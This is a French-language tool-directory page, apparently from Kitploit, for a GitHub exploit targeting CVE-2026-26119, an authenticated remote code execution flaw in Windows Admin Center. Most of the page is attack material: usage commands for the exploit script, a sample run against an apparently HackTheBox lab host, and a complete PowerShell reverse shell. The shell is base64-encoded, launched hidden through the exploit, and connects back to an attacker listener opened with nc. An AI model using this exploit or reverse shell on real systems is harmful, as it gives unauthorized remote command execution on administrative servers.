Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-26119 — WAC RCE - CVE-2026-26119 Windows Admin Center RCE authentifié via WinREST/PowerShell invokeCommand. | Kitploit
Outils/GitHubGitHub/r3vpwnx/cve-2026-26119
Analyse des VulnérabilitésExploitationTests d'Intrusion
GitHubr3vpwnx/cve-2026-26119

CVE-2026-26119

WAC RCE - CVE-2026-26119 Windows Admin Center RCE authentifié via WinREST/PowerShell invokeCommand.

Voir le dépôt
1117il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-26119

WAC RCE - CVE-2026-26119 RCE authentifiée sur Windows Admin Center via WinREST/PowerShell invokeCommand.

Utilisation :

    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

Env :

    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

Comment obtenir le reverse shell :

cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('tun0 IP',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

créer un listener nc :

nc -nlvp 4444
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [tun0] from (UNKNOWN) [IP] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
Télécharger l’outil